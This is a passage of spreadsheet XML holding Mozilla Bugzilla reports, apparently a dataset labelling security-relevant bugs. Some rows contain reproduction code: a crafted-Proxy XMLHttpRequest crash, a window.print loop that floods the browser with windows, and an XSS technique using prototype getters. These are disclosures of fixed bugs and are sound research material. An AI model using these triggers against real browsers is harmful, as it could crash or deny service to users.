        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1419" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1419" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1419" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1419" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1419" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1419" t="inlineStr"/>
      <c r="Q1419" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1419" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1419" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1419" t="n">
        <v>1</v>
      </c>
      <c r="U1419" t="n">
        <v>0</v>
      </c>
      <c r="V1419" t="n">
        <v>4</v>
      </c>
      <c r="W1419" t="inlineStr">
        <is>
          <t>tools/buildbot/bin/python2.6 /builds/slave/tryserver-macosx64-debug/build/build/upload.py --base-path ../../dist \
		"../../dist/firefox-4.0b6pre.en-US.mac64.dmg" \
		 \
		 \
		 \
		"../../dist/firefox-4.0b6pre.en-US.mac64.tests.zip" \
		"../../dist/firefox-4.0b6pre.en-US.mac64.crashreporter-symbols.zip" \
		 \
		"../../dist//firefox-4.0b6pre.en-US.mac64.txt" \
		  ../../dist/firefox-4.0b6pre.en-US.langpack.xpi
Permission denied (publickey).
Last successful upload was within a few hours after Sat Sep 4 18:44:18 2010 PDT</t>
        </is>
      </c>
      <c r="X1419" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1420">
      <c r="A1420" t="n">
        <v>530955</v>
      </c>
      <c r="B1420" t="inlineStr">
        <is>
          <t>2009-11-24 17:44:18 -0800</t>
        </is>
      </c>
      <c r="C1420" t="inlineStr">
        <is>
          <t>New crash [@ ExecuteTree] in Firefox 3.6b3</t>
        </is>
      </c>
      <c r="D1420" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:49 -0700</t>
        </is>
      </c>
      <c r="E1420" t="n">
        <v>1</v>
      </c>
      <c r="F1420" t="n">
        <v>1</v>
      </c>
      <c r="G1420" t="n">
        <v>3</v>
      </c>
      <c r="H1420" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1420" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1420" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1420" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L1420" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1420" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1420" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1420" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1420" t="inlineStr">
        <is>
          <t>[sg:critical][critsmash:investigating]</t>
        </is>
      </c>
      <c r="Q1420" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1420" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1420" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1420" t="n">
        <v>1</v>
      </c>
      <c r="U1420" t="n">
        <v>1</v>
      </c>
      <c r="V1420" t="n">
        <v>52</v>
      </c>
      <c r="W1420" t="inlineStr">
        <is>
          <t>There's a new crash in Firefox 3.6b3 with the signature "ExecuteTree" in Firefox 3.6b3 that hasn't been seen in any of the versions 3\.5.*. So far we've seen 78+ of these crashes in the wild.
Please see http://crash-stats.mozilla.com/query/query?product=Firefox&amp;version=Firefox%3A3.6b3&amp;range_value=1&amp;range_unit=weeks&amp;query_search=signature&amp;query_type=exact&amp;query=ExecuteTree&amp;do_query=1 for more crash info.</t>
        </is>
      </c>
      <c r="X1420" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1421">
      <c r="A1421" t="n">
        <v>1560495</v>
      </c>
      <c r="B1421" t="inlineStr">
        <is>
          <t>2019-06-21 02:13:33 -0700</t>
        </is>
      </c>
      <c r="C1421" t="inlineStr">
        <is>
          <t>[Navigation Timing] unload event test failures</t>
        </is>
      </c>
      <c r="D1421" t="inlineStr">
        <is>
          <t>2020-06-05 00:22:18 -0700</t>
        </is>
      </c>
      <c r="E1421" t="n">
        <v>1</v>
      </c>
      <c r="F1421" t="n">
        <v>1</v>
      </c>
      <c r="G1421" t="n">
        <v>3</v>
      </c>
      <c r="H1421" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1421" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1421" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1421" t="inlineStr">
        <is>
          <t>66 Branch</t>
        </is>
      </c>
      <c r="L1421" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1421" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1421" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1421" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1421" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main69+][adv-esr68.1+][adv-esr60.9+]</t>
        </is>
      </c>
      <c r="Q1421" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1421" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1421" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T1421" t="n">
        <v>1</v>
      </c>
      <c r="U1421" t="n">
        <v>0</v>
      </c>
      <c r="V1421" t="n">
        <v>37</v>
      </c>
      <c r="W1421" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36
Steps to reproduce:
http://w3c-test.org/navigation-timing/unload-event-same-origin-check.html
Actual results:
3 of the test cases are failing
Expected results:
The spec was recently changed as TAO checks in the context of Navigation Timing made little sense: https://github.com/w3c/navigation-timing/pull/108
These failures can have security implications as exposing the unload event's timing can contain sensitive information about the previous page</t>
        </is>
      </c>
      <c r="X1421" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1422">
      <c r="A1422" t="n">
        <v>1087633</v>
      </c>
      <c r="B1422" t="inlineStr">
        <is>
          <t>2014-10-22 14:25:44 -0700</t>
        </is>
      </c>
      <c r="C1422" t="inlineStr">
        <is>
          <t>XMLHttpRequest.prototype.send crashes when given a crafted object</t>
        </is>
      </c>
      <c r="D1422" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E1422" t="n">
        <v>1</v>
      </c>
      <c r="F1422" t="n">
        <v>1</v>
      </c>
      <c r="G1422" t="n">
        <v>3</v>
      </c>
      <c r="H1422" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1422" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1422" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1422" t="inlineStr">
        <is>
          <t>29 Branch</t>
        </is>
      </c>
      <c r="L1422" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1422" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1422" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1422" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1422" t="inlineStr">
        <is>
          <t>[adv-main34+][adv-esr31.3+] thread checks seem to protect from the worst</t>
        </is>
      </c>
      <c r="Q1422" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1422" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1422" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T1422" t="n">
        <v>1</v>
      </c>
      <c r="U1422" t="n">
        <v>0</v>
      </c>
      <c r="V1422" t="n">
        <v>38</v>
      </c>
      <c r="W1422" t="inlineStr">
        <is>
          <t>Created attachment 8509812
screenshot of call stack
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36
Steps to reproduce:
Crashes safely on an out-of-thread access:
xhr = new XMLHttpRequest();
xhr.open('POST', '/');
xhr.send({available: function(){}});
Crashes safely on null ptr deref:
q=0;
u = new Proxy({}, {get:function(){
  if(q++&gt;0){xhr.abort()}
  return function(){};
}});
xhr = new XMLHttpRequest();
xhr.open('POST', '/k');
xhr.send(u);
I didn't explore any further. Looks like a type confusion issue. I poked around a bit to look for exploitability, but nothing obvious jumped out at me.
Expected results:
Sorry for the terrible huge crash screenshot! I forgot to dump the stack to text.</t>
        </is>
      </c>
      <c r="X1422" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1423">
      <c r="A1423" t="n">
        <v>74758</v>
      </c>
      <c r="B1423" t="inlineStr">
        <is>
          <t>2001-04-04 12:30:08 -0700</t>
        </is>
      </c>
      <c r="C1423" t="inlineStr">
        <is>
          <t>failure to test for gnu_get_libc_version() correctly</t>
        </is>
      </c>
      <c r="D1423" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E1423" t="n">
        <v>1</v>
      </c>
      <c r="F1423" t="n">
        <v>1</v>
      </c>
      <c r="G1423" t="n">
        <v>2</v>
      </c>
      <c r="H1423" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1423" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J1423" t="inlineStr">
        <is>
          <t>Build Config</t>
        </is>
      </c>
      <c r="K1423" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1423" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M1423" t="inlineStr">
        <is>
          <t>BSDI</t>
        </is>
      </c>
      <c r="N1423" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1423" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1423" t="inlineStr"/>
      <c r="Q1423" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1423" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1423" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1423" t="n">
        <v>1</v>
      </c>
      <c r="U1423" t="n">
        <v>0</v>
      </c>
      <c r="V1423" t="n">
        <v>7</v>
      </c>
      <c r="W1423" t="inlineStr">
        <is>
          <t>The recent change to the top-level configure script to test for
the existance of the gnu_get_libc_version() library call is
inadequate to actually figure out if the function is present.
Merely compiling the sample file into a .o doesn't tell if you
if the function is in libc.  The program must actually try to
link all the way to a finished program.
I think that the following patch is correct to make it link all
the way (I'm no autoconf guru, certainly.)
lidl@meketrex-43: cvs diff -u configure.in 
Index: configure.in
===================================================================
RCS file: /cvsroot/mozilla/configure.in,v
retrieving revision 1.817
diff -u -r1.817 configure.in
--- configure.in        2001/04/04 11:02:06     1.817
+++ configure.in        2001/04/04 19:24:40
@@ -2453,7 +2453,7 @@
 AC_CACHE_CHECK(
     [for gnu_get_libc_version()],
     ac_cv_func_gnu_get_libc_version,
-    [AC_TRY_COMPILE([
+    [AC_TRY_LINK([
         #ifdef HAVE_GNU_LIBC_VERSION_H
         #include &lt;gnu/libc-version.h&gt;
         #endif
Merely testing to see if 'gcc -c conftest.c' will work results in an
object file with the function call as an unreferenced symbol in the
.o file:
lidl@sloar-243: nm conftest.o 
00000000 f conftest.c
00000000 t gcc2_compiled.
         U gnu_get_libc_version
00000000 T main
-Kurt</t>
        </is>
      </c>
      <c r="X1423" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1424">
      <c r="A1424" t="n">
        <v>848644</v>
      </c>
      <c r="B1424" t="inlineStr">
        <is>
          <t>2013-03-06 18:46:55 -0800</t>
        </is>
      </c>
      <c r="C1424" t="inlineStr">
        <is>
          <t>Use-after-free caused by us replacing the nsHTMLEditor's edit rules object while running scripts from the flush happening in nsEditor::IsPreformatted triggered by execCommand from web content</t>
        </is>
      </c>
      <c r="D1424" t="inlineStr">
        <is>
          <t>2020-03-10 21:15:13 -0700</t>
        </is>
      </c>
      <c r="E1424" t="n">
        <v>1</v>
      </c>
      <c r="F1424" t="n">
        <v>1</v>
      </c>
      <c r="G1424" t="n">
        <v>3</v>
      </c>
      <c r="H1424" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1424" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1424" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K1424" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1424" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1424" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1424" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1424" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1424" t="inlineStr">
        <is>
          <t>Pwn2Own 2013 bug</t>
        </is>
      </c>
      <c r="Q1424" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1424" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1424" t="inlineStr">
        <is>
          <t>mozilla22</t>
        </is>
      </c>
      <c r="T1424" t="n">
        <v>1</v>
      </c>
      <c r="U1424" t="n">
        <v>0</v>
      </c>
      <c r="V1424" t="n">
        <v>92</v>
      </c>
      <c r="W1424" t="inlineStr">
        <is>
          <t>Placeholder for Pwn2Own bug found in Firefox by VUPEN at CanSecWest 2013.</t>
        </is>
      </c>
      <c r="X1424" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1425">
      <c r="A1425" t="n">
        <v>920456</v>
      </c>
      <c r="B1425" t="inlineStr">
        <is>
          <t>2013-09-25 04:23:00 -0700</t>
        </is>
      </c>
      <c r="C1425" t="inlineStr">
        <is>
          <t>Clicking "sign me up" on mobile "Get involved" page should show mobile sign-up flow</t>
        </is>
      </c>
      <c r="D1425" t="inlineStr">
        <is>
          <t>2013-09-25 07:40:54 -0700</t>
        </is>
      </c>
      <c r="E1425" t="n">
        <v>1</v>
      </c>
      <c r="F1425" t="n">
        <v>1</v>
      </c>
      <c r="G1425" t="n">
        <v>5</v>
      </c>
      <c r="H1425" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1425" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1425" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K1425" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1425" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1425" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1425" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1425" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1425" t="inlineStr">
        <is>
          <t>u=user c=aaq p=1 s=2013.19</t>
        </is>
      </c>
      <c r="Q1425" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1425" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1425" t="inlineStr">
        <is>
          <t>2013Q3</t>
        </is>
      </c>
      <c r="T1425" t="n">
        <v>1</v>
      </c>
      <c r="U1425" t="n">
        <v>0</v>
      </c>
      <c r="V1425" t="n">
        <v>5</v>
      </c>
      <c r="W1425" t="inlineStr">
        <is>
          <t>Created attachment 809806
Screenshot of broken desktop page on Firefox OS device
Clicking "sign me up" on mobile "Get involved" page brings you to the desktop sign up page and the shown page is weirdly resized, so it's unusable. Instead we should sign people up with the mobile sign-up flow.</t>
        </is>
      </c>
      <c r="X1425" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1426">
      <c r="A1426" t="n">
        <v>898207</v>
      </c>
      <c r="B1426" t="inlineStr">
        <is>
          <t>2013-07-25 17:07:25 -0700</t>
        </is>
      </c>
      <c r="C1426" t="inlineStr">
        <is>
          <t>Intermittent TEST-UNEXPECTED-FAIL | tests/test-context-menu.testNewPrivateWindow | Timed out</t>
        </is>
      </c>
      <c r="D1426" t="inlineStr">
        <is>
          <t>2013-08-23 07:11:38 -0700</t>
        </is>
      </c>
      <c r="E1426" t="n">
        <v>1</v>
      </c>
      <c r="F1426" t="n">
        <v>1</v>
      </c>
      <c r="G1426" t="n">
        <v>6</v>
      </c>
      <c r="H1426" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1426" t="inlineStr">
        <is>
          <t>Add-on SDK Graveyard</t>
        </is>
      </c>
      <c r="J1426" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1426" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1426" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1426" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1426" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1426" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1426" t="inlineStr"/>
      <c r="Q1426" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1426" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1426" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T1426" t="n">
        <v>1</v>
      </c>
      <c r="U1426" t="n">
        <v>0</v>
      </c>
      <c r="V1426" t="n">
        <v>13</v>
      </c>
      <c r="W1426" t="inlineStr">
        <is>
          <t>https://tbpl.mozilla.org/php/getParsedLog.php?id=25741972&amp;tree=Fx-Team#error0 
TEST-UNEXPECTED-FAIL | tests/test-context-menu.testNewPrivateWindow | Timed out
TEST-INFO | Traceback (most recent call last):
  File "resource://gre/modules/commonjs/sdk/timers.js", line 31, in notify
    callback.apply(null, args);
  File "resource://gre/modules/commonjs/sdk/deprecated/unit-test.js", line 424, in tiredOfWaiting
    self.console.testMessage(false, false, self.test.name, "Timed out");
  File "resource://gre/modules/commonjs/sdk/test/harness.js", line 523, in testMessage
    this.trace();
--DOMWINDOW == 348 (0x18dc4788) [serial = 1687] [outer = (nil)] [url = about:privatebrowsing]
--DOMWINDOW == 347 (0x15245988) [serial = 1674] [outer = (nil)] [url = about:privatebrowsing]
--DOMWINDOW == 346 (0x186e5090) [serial = 1691] [outer = (nil)] [url = about:blank]
--DOMWINDOW == 345 (0x1baf4e20) [serial = 1678] [outer = (nil)] [url = about:blank]
WARNING: NS_ENSURE_TRUE(mMutable) failed: file ../../../../netwerk/base/src/nsSimpleURI.cpp, line 266
************************************************************
* Call to xpconnect wrapped JSObject produced this error:  *
[Exception... "'[JavaScript Error: "aBrowser.webNavigation is undefined" {file: "resource://app/modules/NetworkPrioritizer.jsm" line: 85}]' when calling method: [nsIDOMEventListener::handleEvent]"  nsresult: "0x80570021 (NS_ERROR_XPC_JAVASCRIPT_ERROR_WITH_DETAILS)"  location: "JS frame :: chrome://browser/content/tabbrowser.xml :: updateCurrentBrowser :: line 1062"  data: yes]
************************************************************
WARNING: NS_ENSURE_TRUE(mDoneSetup) failed: file ../../../../editor/composer/src/nsEditingSession.cpp, line 1315
TEST-END | tests/test-context-menu.testNewPrivateWindow</t>
        </is>
      </c>
      <c r="X1426" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1427">
      <c r="A1427" t="n">
        <v>1246054</v>
      </c>
      <c r="B1427" t="inlineStr">
        <is>
          <t>2016-02-04 18:47:34 -0800</t>
        </is>
      </c>
      <c r="C1427" t="inlineStr">
        <is>
          <t>Regressed bug 445229 exploitable plugin crash</t>
        </is>
      </c>
      <c r="D1427" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E1427" t="n">
        <v>1</v>
      </c>
      <c r="F1427" t="n">
        <v>1</v>
      </c>
      <c r="G1427" t="n">
        <v>6</v>
      </c>
      <c r="H1427" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1427" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1427" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K1427" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L1427" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1427" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1427" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1427" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1427" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+][post-critsmash-triage]CESG REF: 54041238 / VULNERABILITY ID: 429485</t>
        </is>
      </c>
      <c r="Q1427" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1427" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1427" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T1427" t="n">
        <v>1</v>
      </c>
      <c r="U1427" t="n">
        <v>0</v>
      </c>
      <c r="V1427" t="n">
        <v>24</v>
      </c>
      <c r="W1427" t="inlineStr">
        <is>
          <t>Created attachment 8716142
CESG Vulenrability Report (pdf)
The CESG (https://www.cesg.gov.uk/) sent a vulnerability report to the security alias concerning a bug in NPAPI.
CESG REF: 54041238 / VULNERABILITY ID: 429485
Details in the attached PDF (unfortunately no testcase, as was true of the regressed bug 445229).
   "Firefox has suffered a regression of bug 445229. We believe there to
   be an incorrect assumption regarding the purpose of a certain variable
   assignment which is assumed to be obsolete. This may cause the NPAPI
   subsystem to crash. [...]
   The assignment at [0] is to re-validate a dangling pointer under
   certain conditions. [...]"
[0] refers to line 916 in
http://hg.mozilla.org/mozilla-central/file/ff99308cdefc/dom/plugins/base/nsJSNPRuntime.cpp#l1912  They continue
   "The comment, in both the before and after commits, explains the
   purpose of reloading the entry. There is an assumption that it is
   only required for the sake of the assertion. After changing the 
   assertion to a format that does not require 'entry', the re-assignment
   has been removed.
   The removal of the assignment leads to a dangling pointer dereference
   in a non-standard feature of Firefox (the NPAPI plugin subsystem).
   Proof of Concept
   The high-level PoC to trigger the vulnerability and cause a crash is
   as follows:
   1. write a NPAPI plug-in which has a function that creates and returns
   a new NPObject every time it is called;
   2. call that function in a loop from Javascript.
   The browser will likely crash when a HashTable Object resizes its
   underlying data storage."</t>
        </is>
      </c>
      <c r="X1427" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1428">
      <c r="A1428" t="n">
        <v>1789439</v>
      </c>
      <c r="B1428" t="inlineStr">
        <is>
          <t>2022-09-06 08:38:11 -0700</t>
        </is>
      </c>
      <c r="C1428" t="inlineStr">
        <is>
          <t>Persistent Popup DoS with window.print</t>
        </is>
      </c>
      <c r="D1428" t="inlineStr">
        <is>
          <t>2024-05-30 11:00:14 -0700</t>
        </is>
      </c>
      <c r="E1428" t="n">
        <v>1</v>
      </c>
      <c r="F1428" t="n">
        <v>1</v>
      </c>
      <c r="G1428" t="n">
        <v>3</v>
      </c>
      <c r="H1428" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1428" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1428" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1428" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1428" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1428" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1428" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1428" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1428" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main106+][adv-esr102.4+]</t>
        </is>
      </c>
      <c r="Q1428" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1428" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1428" t="inlineStr">
        <is>
          <t>106 Branch</t>
        </is>
      </c>
      <c r="T1428" t="n">
        <v>1</v>
      </c>
      <c r="U1428" t="n">
        <v>0</v>
      </c>
      <c r="V1428" t="n">
        <v>17</v>
      </c>
      <c r="W1428" t="inlineStr">
        <is>
          <t>I have been testing the window.print functionality in Firefox. At some point, I found that running two print() calls simultaneously in the console (without closing the dialog after the first one) leads to a new browser window opening without any popup permissions. The tab inside the new window is mostly broken, for example it cannot be redirected, but it does get restored by session restore function when quitting firefox.
After a bit of testing different methods to reproduce the parallel nature of this bug within single-threaded JavaScript, I ended up the the following (warning: will keep spawning windows indefinitely, in my case leading to OOM):
```
window.addEventListener('beforeprint', (event) =&gt; {
  print()
});
print()
```
This denial of service is persistent in multiple ways; if the malicious website remains open after session restore, or if the windows open by the malicious website are kept in session restore. When testing this it was difficult to stop the browser because the new windows were stealing focus, exacerbating the issue. Therefore this can lead to persistent full denial of service of browser functionality in the worst case.
This has been tested on Nightly, Mozilla Firefox 106.0a1 20220906092849 20220906092849.</t>
        </is>
      </c>
      <c r="X1428" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1429">
      <c r="A1429" t="n">
        <v>289675</v>
      </c>
      <c r="B1429" t="inlineStr">
        <is>
          <t>2005-04-09 00:55:14 -0700</t>
        </is>
      </c>
      <c r="C1429" t="inlineStr">
        <is>
          <t>getter/setter on window.__proto__.__proto__.__proto__ allows XSS attacks</t>
        </is>
      </c>
      <c r="D1429" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E1429" t="n">
        <v>1</v>
      </c>
      <c r="F1429" t="n">
        <v>1</v>
      </c>
      <c r="G1429" t="n">
        <v>3</v>
      </c>
      <c r="H1429" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1429" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1429" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1429" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1429" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1429" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1429" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1429" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1429" t="inlineStr">
        <is>
          <t>[sg:fix] Hold private until April 25,2005</t>
        </is>
      </c>
      <c r="Q1429" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1429" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1429" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1429" t="n">
        <v>1</v>
      </c>
      <c r="U1429" t="n">
        <v>0</v>
      </c>
      <c r="V1429" t="n">
        <v>15</v>
      </c>
      <c r="W1429" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Build Identifier: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.7.6) Gecko/20050317 Firefox/1.0.2
Getter/setter defined on window.__proto__.__proto__.__proto__ is
executed when a global variable is used in scripts,
but is not cleared when a new page is loaded.
Therefore allows XSS attacks.
Testcase available.
Reproducible: Always
Steps to Reproduce:
1.define getter/setter on window.__proto__.__proto__.__proto__ with some name.
2.navigate the browser to the page that uses a global variable with a name 
defined in step 1.
Actual Results:  
Getter/setter defined in step 1 will be evaluated in the context of a new page.
Expected Results:  
Getter/setter defined in step 1 must be cleared when loading a new page.
Or, do not allow web pages to poison window.__proto__.__proto__.__proto__.</t>
        </is>
      </c>
      <c r="X1429" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1430">
      <c r="A1430" t="n">
        <v>1197550</v>
      </c>
      <c r="B1430" t="inlineStr">
        <is>
          <t>2015-08-22 21:36:38 -0700</t>
        </is>
      </c>
      <c r="C1430" t="inlineStr">
        <is>
          <t>Persona login fails with 403 Forbidden: CSRF verification failed</t>
        </is>
      </c>
      <c r="D1430" t="inlineStr">
        <is>
          <t>2015-08-24 13:14:54 -0700</t>
        </is>
      </c>
      <c r="E1430" t="n">
        <v>1</v>
      </c>
